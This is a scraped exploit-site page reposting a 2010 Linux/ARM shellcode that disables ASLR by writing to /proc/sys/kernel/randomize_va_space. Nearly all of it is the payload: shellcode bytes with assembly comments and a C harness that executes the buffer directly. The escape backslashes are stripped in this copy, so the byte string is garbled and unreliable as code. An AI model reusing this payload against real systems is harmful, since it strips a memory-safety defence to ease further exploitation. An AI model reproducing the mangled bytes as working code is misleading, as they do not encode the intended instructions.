Home / os / win7

linux/ARM - Disable ASLR Security - 102 bytes

Posted on 30 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>linux/ARM - Disable ASLR Security - 102 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================
linux/ARM - Disable ASLR Security - 102 bytes
=============================================

/*
Title:  Linux/ARM - Disable ASLR Security - 102 bytes
Date:   2010-06-20
Tested: Linux ARM9 2.6.28-6-versatile
 
Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/shell_storm
 
! Database of shellcodes http://www.shell-storm.org/shellcode/
 
 
Description:
============
 Address space layout randomization (ASLR) is a computer security technique
 which involves randomly arranging the positions of key data areas, usually
 including the base  of the executable and position of libraries, heap, and
 stack, in a process's address space.
 
 This shellcode disables the ASLR on linux/ARM
 
*/
 
#include &lt;stdio.h&gt;
 
char *SC = &quot;x01x30x8fxe2&quot;  // add    r3, pc, #1
           &quot;x13xffx2fxe1&quot;  // bx     r3
           &quot;x24x1b&quot;          // subs   r4, r4, r4
           &quot;x20x1c&quot;          // adds   r0, r4, #0
           &quot;x17x27&quot;          // movs   r7, #23
           &quot;x01xdf&quot;          // svc    1
           &quot;x78x46&quot;          // mov    r0, pc
           &quot;x2ex30&quot;          // adds   r0, #46
           &quot;xc8x21&quot;          // movs   r1, #200
           &quot;xc8x31&quot;          // adds   r1, #200
           &quot;xc8x31&quot;          // adds   r1, #200
           &quot;xc8x31&quot;          // adds   r1, #200
           &quot;xc8x31&quot;          // adds   r1, #200
           &quot;x59x31&quot;          // adds   r1, #89
           &quot;xc8x22&quot;          // movs   r2, #200
           &quot;xc8x32&quot;          // adds   r2, #200
           &quot;x14x32&quot;          // adds   r2, #20
           &quot;x05x27&quot;          // movs   r7, #5
           &quot;x01xdf&quot;          // svc    1
           &quot;x03x20&quot;          // movs   r0, #3
           &quot;x79x46&quot;          // mov    r1, pc
           &quot;x0ex31&quot;          // adds   r1, #14
           &quot;x02x22&quot;          // movs   r2, #2
           &quot;x04x27&quot;          // movs   r7, #4
           &quot;x01xdf&quot;          // svc    1
           &quot;x92x1a&quot;          // subs   r2, r2, r2
           &quot;x10x1c&quot;          // adds   r0, r2, #0
           &quot;x01x27&quot;          // movs   r7, #1
           &quot;x01xdf&quot;          // svc    1
            
           &quot;x30x0a&quot;          // ^
           &quot;x2dx2d&quot;          // |
           &quot;x2fx2f&quot;          // |
           &quot;x70x72&quot;          // |
           &quot;x6fx63&quot;          // |
           &quot;x2fx73&quot;          // |
           &quot;x79x73&quot;          // |
           &quot;x2fx6b&quot;          // |
           &quot;x65x72&quot;          // |
           &quot;x6ex65&quot;          // |  [ strings ]
           &quot;x6cx2f&quot;          // |
           &quot;x72x61&quot;          // |
           &quot;x6ex64&quot;          // |
           &quot;x6fx6d&quot;          // |
           &quot;x69x7a&quot;          // |
           &quot;x65x5f&quot;          // |
           &quot;x76x61&quot;          // |
           &quot;x5fx73&quot;          // |
           &quot;x70x61&quot;          // |
           &quot;x63x65&quot;;         // v
 
 
int main(void)
{
        fprintf(stdout,&quot;Length: %d
&quot;,strlen(SC));
        (*(void(*)()) SC)();
return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :